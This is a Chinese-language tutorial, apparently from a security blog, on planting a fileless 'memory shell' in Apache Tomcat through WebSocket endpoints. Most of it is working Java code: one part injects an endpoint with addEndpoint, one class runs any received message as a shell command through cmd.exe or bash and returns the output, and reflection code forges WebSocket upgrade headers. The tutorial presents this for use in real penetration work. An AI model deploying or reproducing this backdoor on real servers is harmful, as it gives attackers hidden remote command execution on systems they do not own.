tomcat websocket内存马
目录
addEndpoint 注入内存
websocket内存马是一个比较新的内存马,它是通过addEndpoint方法被塞进内存中的。注起来也比较简单
恶意类可以这样被植入到内存中
ServerContainer container = (ServerContainer) req.getServletContext().getAttribute(ServerContainer.class.getName());
ServerEndpointConfig config = ServerEndpointConfig.Builder.create(evil.class, "/ws").build();
container.addEndpoint(config);
恶意类长这样,调用onmessage方法进行恶意操作
public static class C extends Endpoint implements MessageHandler.Whole<String> {
private Session session;
@Override
public void onMessage(String s) {
try {
Process process;
boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
if (bool) {
process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
} else {
process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
}
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
int i;
while ((i = inputStream.read()) != -1)
stringBuilder.append((char)i);
inputStream.close();
process.waitFor();
session.getBasicRemote().sendText(stringBuilder.toString());
} catch (Exception exception) {
exception.printStackTrace();
}
}
@Override
public void onOpen(final Session session, EndpointConfig config) {
this.session = session;
session.addMessageHandler(this);
}
}
植入后的触发逻辑
注释
也可以通过注释来添加webscoket端点,但是实际渗透中我们往往是传jsp,jsp不支持注释。 所以这个方法了解一下即可。
@ServerEndpoint(value = "/websocket")
手动升级-无需注入
private void SetHeader(HttpServletRequest request, String key, String value){
Class<? extends HttpServletRequest> requestClass = request.getClass();
try {
Field requestField = requestClass.getDeclaredField("request");
requestField.setAccessible(true);
Object requestObj = requestField.get(request);
Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
coyoteRequestField.setAccessible(true);
Object coyoteRequestObj = coyoteRequestField.get(requestObj);
Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
headersField.setAccessible(true);
MimeHeaders headersObj = (MimeHeaders)headersField.get(coyoteRequestObj);
headersObj.removeHeader(key);
headersObj.addValue(key).setString(value);
} catch (Exception e) {
e.printStackTrace();
}
}
SetHeader(request,"Connection","upgrade");
SetHeader(request,"Sec-WebSocket-Version","13");
SetHeader(request,"Upgrade","websocket");